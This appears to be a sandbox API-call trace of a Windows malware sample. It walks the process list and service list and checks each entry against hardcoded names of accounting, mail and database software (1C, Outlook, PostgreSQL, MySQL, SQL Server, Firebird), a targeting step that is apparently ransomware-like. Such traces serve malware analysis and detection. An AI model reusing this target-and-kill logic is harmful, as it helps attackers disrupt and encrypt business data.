	[0141.504] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0141.504] lstrlenW (lpString="csrss.exe") returned 9
	[0141.505] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0141.505] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0141.505] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0141.505] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0141.505] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0141.505] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0141.505] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0141.505] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0141.505] lstrlenW (lpString="wininit.exe") returned 11
	[0141.505] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0141.505] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0141.505] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0141.505] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0141.505] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0141.505] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0141.505] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0141.505] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0141.506] lstrlenW (lpString="csrss.exe") returned 9
	[0141.506] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0141.506] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0141.506] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0141.506] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0141.506] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0141.506] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0141.506] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0141.506] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0141.506] lstrlenW (lpString="winlogon.exe") returned 12
	[0141.506] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0141.506] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0141.506] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0141.506] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0141.506] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0141.506] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0141.506] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0141.506] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0141.507] lstrlenW (lpString="services.exe") returned 12
	[0141.507] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0141.507] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0141.507] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0141.507] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0141.507] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0141.507] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0141.507] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0141.507] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0141.507] lstrlenW (lpString="lsass.exe") returned 9
	[0141.507] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0141.508] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0141.508] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0141.508] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0141.508] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0141.508] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0141.508] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0141.508] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0141.508] lstrlenW (lpString="lsm.exe") returned 7
	[0141.508] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0141.508] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0141.508] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0141.508] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0141.508] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0141.508] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0141.508] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0141.508] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0141.509] lstrlenW (lpString="svchost.exe") returned 11
	[0141.509] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0141.509] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0141.509] lstrlenW (lpString="svchost.exe") returned 11
	[0141.509] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0141.509] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0141.509] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0141.510] lstrlenW (lpString="svchost.exe") returned 11
	[0141.510] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0141.510] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0141.510] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0141.510] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0141.510] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0141.510] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0141.510] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0141.510] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0141.510] lstrlenW (lpString="svchost.exe") returned 11
	[0141.510] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0141.511] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0141.511] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0141.511] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0141.511] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0141.511] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0141.511] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0141.511] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0141.511] lstrlenW (lpString="svchost.exe") returned 11
	[0141.511] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0141.511] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0141.511] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0141.511] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0141.512] lstrlenW (lpString="audiodg.exe") returned 11
	[0141.512] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0141.512] lstrlenW (lpString="svchost.exe") returned 11
	[0141.512] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0141.512] lstrlenW (lpString="svchost.exe") returned 11
	[0141.512] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0141.513] lstrlenW (lpString="spoolsv.exe") returned 11
	[0141.513] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0141.513] lstrlenW (lpString="svchost.exe") returned 11
	[0141.513] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0141.514] lstrlenW (lpString="taskhost.exe") returned 12
	[0141.514] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0141.514] lstrlenW (lpString="userinit.exe") returned 12
	[0141.514] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0141.515] lstrlenW (lpString="dwm.exe") returned 7
	[0141.515] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0141.515] lstrlenW (lpString="explorer.exe") returned 12
	[0141.515] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0141.516] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0141.516] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0141.516] lstrlenW (lpString="reader_sl.exe") returned 13
	[0141.516] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0141.516] CloseHandle (hObject=0x31c) returned 1
	[0141.516] Sleep (dwMilliseconds=0x1f4) 
	[0142.077] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616fa8
	[0142.230] EnumServicesStatusExW (in: hSCManager=0xb616fa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0142.244] GetLastError () returned 0xea
	[0142.244] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0142.244] EnumServicesStatusExW (in: hSCManager=0xb616fa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0142.244] CloseServiceHandle (hSCObject=0xb616fa8) returned 1
	[0142.244] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0142.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0142.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0142.244] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0142.244] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0142.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0142.245] lstrlenW (lpString="AudioSrv") returned 8
	[0142.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0142.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0142.245] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0142.245] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0142.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0142.245] lstrlenW (lpString="BFE") returned 3
	[0142.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0142.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0142.245] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0142.245] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0142.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0142.245] lstrlenW (lpString="CryptSvc") returned 8
	[0142.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0142.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0142.245] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0142.245] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0142.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0142.245] lstrlenW (lpString="CscService") returned 10
	[0142.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0142.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0142.245] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0142.245] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0142.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0142.245] lstrlenW (lpString="DcomLaunch") returned 10
	[0142.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0142.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0142.245] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0142.245] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0142.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0142.245] lstrlenW (lpString="Dhcp") returned 4
	[0142.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0142.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0142.246] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0142.246] lstrlenW (lpString="Dnscache") returned 8
	[0142.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0142.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0142.246] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0142.246] lstrlenW (lpString="DPS") returned 3
	[0142.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0142.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0142.246] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0142.246] lstrlenW (lpString="eventlog") returned 8
	[0142.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0142.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0142.246] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0142.246] lstrlenW (lpString="EventSystem") returned 11
	[0142.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0142.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0142.246] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0142.246] lstrlenW (lpString="gpsvc") returned 5
	[0142.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0142.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0142.246] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0142.246] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0142.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0142.247] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0142.247] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0142.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0142.247] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0142.247] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0142.247] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0142.247] lstrlenW (lpString="lmhosts") returned 7
	[0142.247] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0142.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0142.247] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0142.247] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0142.247] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0142.247] lstrlenW (lpString="MMCSS") returned 5
	[0142.247] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0142.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0142.247] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0142.247] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0142.247] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0142.247] lstrlenW (lpString="MpsSvc") returned 6
	[0142.247] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0142.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0142.247] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0142.247] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0142.247] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0142.247] lstrlenW (lpString="NlaSvc") returned 6
	[0142.247] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0142.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0142.247] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0142.247] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0142.247] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0142.247] lstrlenW (lpString="nsi") returned 3
	[0142.247] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0142.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0142.248] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0142.248] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0142.248] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0142.248] lstrlenW (lpString="PcaSvc") returned 6
	[0142.248] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0142.248] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0142.248] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0142.248] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0142.248] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0142.248] lstrlenW (lpString="PlugPlay") returned 8
	[0142.248] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0142.248] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0142.248] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0142.248] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0142.248] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0142.248] lstrlenW (lpString="Power") returned 5
	[0142.248] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0142.248] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
